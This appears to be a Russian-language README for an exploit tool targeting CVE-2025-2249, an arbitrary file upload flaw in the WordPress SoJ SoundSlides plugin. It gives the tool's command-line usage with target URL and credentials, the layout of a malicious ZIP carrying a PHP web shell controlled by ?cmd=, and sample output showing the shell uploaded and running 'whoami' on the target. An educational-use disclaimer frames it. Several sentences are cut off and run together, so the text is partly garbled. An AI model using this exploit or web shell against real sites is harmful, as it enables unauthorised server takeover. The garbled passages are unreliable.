
Плагин SoJ SoundSlides для WordPress версии <= 1.2.2 уязвим для произвольной загрузки файлов
⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Этот эксплойт предназначен только для образовательных целей и авторизованного тестирования.
Плагин SoJ SoundSlides позволяет аутентифицированным пользователям с ролями Участник или выше загружать произвольные ZIP-файлы. Из-за отсутствия проверки злоумышленники могут загрузить PHP-веб-оболочки, которые извлекаются и выполняются из веб-доступного каталога.
Злоумышленник с действительными учетными данными WordPress может:
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| Аргумент | Описание |
|---|---|
-u | Базовый URL WordPress |
-un | Имя пользователя WordPress |
-p | Пароль WordPress |
readme.txt плагинаnxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ на наличие неожиданных .php файловСоздано с ❤️ [Nxploited | Khaled ALenazi]
Для образования, осведомленности и защиты.
Безопасность — это обязанность каждого. Всегда тестируйте этично, сообщайте ответственно и защищайте Интернет.